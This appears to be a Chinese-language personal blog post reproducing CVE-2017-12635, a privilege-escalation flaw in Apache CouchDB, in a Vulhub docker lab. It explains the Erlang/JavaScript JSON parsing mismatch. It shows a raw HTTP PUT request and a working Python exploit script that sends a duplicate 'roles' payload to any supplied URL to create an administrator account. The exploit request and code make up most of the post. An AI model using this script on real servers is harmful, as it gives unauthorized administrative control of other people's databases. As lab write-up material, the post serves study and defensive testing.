CVE-2017-12635 recurrence

  1. 前言
  2. 正文

前言

复现CVE-2017-12635,今天是大年初一。祝大家新年快乐,个人喜好一个人待在房间里写码,日站过不过年感觉没什么感觉吧
t013e381f5ee009a47e.jpg?size=500x281

正文

漏洞介绍
Couchdb 垂直权限绕过漏洞(CVE-2017-12635)
Apache CouchDB是一个开源数据库,专注于易用性和成为”完全拥抱web的数据库”。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。

在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。

影响版本:小于 1.7.0 以及 小于 2.1.1

参考链接:

http://bobao.360.cn/learning/detail/4716.html
https://justi.cz/security/2017/11/14/couchdb-rce-npm.html

环境搭建
进入对应的CVE文件夹

docker-compose up -d

搭建好之后访问:http://127.0.0.15984/_utils/# ,会出现如下图所示
kY1Kvq.png

我们并不知道账号密码,所以无法登陆

漏洞复现

首先,发送如下数据包:

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 90

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "password": "vulhub"
}

可见,返回403错误:{“error”:”forbidden”,”reason”:”Only _admin may set roles”},只有管理员才能设置Role角色:
kY1HiQ.md.png

发送包含两个roles的数据包,即可绕过限制:
kY1bGj.md.png

利用代码

#author:九世
#time:2019/2/5
#source:https://vulhub.org/#/environments/couchdb/CVE-2017-12635/
import requests

def cve_2017_12635(urlq,username,password):
    urls=str(urlq).strip()+'/_users/org.couchdb.user:{}'.format(username)
    headers={'user-agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36','Content-Type': 'application/json'}
    payload = '{"type": "user", "name": "'+username
    payload += '", "roles": ["_admin"], "roles": [],'
    payload += '"password": "' + '{}'.format(password)+ '"}'
    print(payload)
    rqt=requests.put(url=urls,headers=headers,data=payload)
    if rqt.status_code==201:
        print('[+] username:{}\n[+] password:{}'.format(username,password))
    elif rqt.status_code==409:
        print('[-] Not Found CVE-2017-12635')
    else:
        print('[-] rqt_status_code:{}'.format(rqt.status_code))

测试:

转载请声明:转自422926799.github.io


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:CVE-2017-12635 recurrence

本文作者:九世

发布时间:2019-02-05, 22:27:33

最后更新:2019-04-19, 20:36:16

原始链接:http://422926799.github.io/posts/c0c88449.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录